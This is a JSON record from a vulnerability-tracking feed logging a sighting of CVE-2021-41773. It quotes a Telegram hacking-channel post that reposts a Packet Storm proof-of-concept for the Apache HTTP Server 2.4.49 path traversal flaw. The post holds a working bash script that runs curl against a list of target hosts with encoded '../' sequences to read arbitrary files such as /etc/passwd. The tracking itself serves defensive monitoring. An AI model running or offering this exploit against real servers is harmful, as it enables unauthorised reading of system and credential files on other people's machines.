{"uuid": "55c21b75-b5ef-4abc-8ddd-adfa00946782", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/hacking_Attack/26502", "content": "Exploit Collector\nApache HTTP Server 2.4.49 Path Traversal\n\nhttps://2.bp.blogspot.com/-QZ2Sf2sxziM/WWlvZhEG73I/AAAAAAAAIO0/d0s8s4TXkHwnfXzbpubNEBqDxa568NQgwCLcBGAs/s1600/h60.png \nApache HTTP Server version 2.4.49 suffers from a path traversal vulnerability.\n\nMD5 | 1f8f44361142a2acbf7b9f53b654f29a\n\nDownload\n# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal\n# Date: 10/05/2021\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage:  https://apache.org/\n# Version: 2.4.49\n# Tested on: 2.4.49\n# CVE : CVE-2021-41773\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\nif [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then\necho Set [TAGET-LIST.TXT] [PATH]\necho ./PoC.sh targets.txt /etc/passwd\nexit\nfi\nfor host in $(cat $1); do\ncurl --silent --path-as-is --insecure \"$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2\"; done\n\nSource:packetstormsecurity.com\n\n___________________________ \n@hacking_Attack\n@Hacking_Video", "creation_timestamp": "2026-09-02T01:02:46.525587Z"}